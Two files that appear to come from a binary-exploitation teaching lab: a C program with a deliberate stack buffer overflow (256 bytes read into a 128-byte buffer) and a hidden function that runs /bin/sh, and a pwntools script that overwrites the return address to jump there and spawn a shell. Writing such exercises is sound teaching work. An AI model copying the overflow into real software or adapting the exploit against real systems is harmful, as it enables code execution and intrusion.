File: 04-binary/04-hardening/rop/03-x86-64.py
#!/usr/bin/python

from pwn import *

context(arch='x86', os='linux', endian='little', word_size=64)

p = process('./03-x86-64')
# p = gdb.debug(['./03-x86-64'])

payload = ''
payload += 'a' * 128     # buffer
payload += 'b' * 8       # old rbp
payload += p64(0x40057d) # not_called address

p.send(payload)

p.interactive()

File: 04-binary/04-hardening/rop/03-x86-64.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int not_called() {
  system("/bin/sh");

  return 0;
}

int vulnerable() {
  char buffer[128];

  read(STDIN_FILENO, buffer, 256);

  return 0;
}

int main() {
  vulnerable();

  return 0;
}
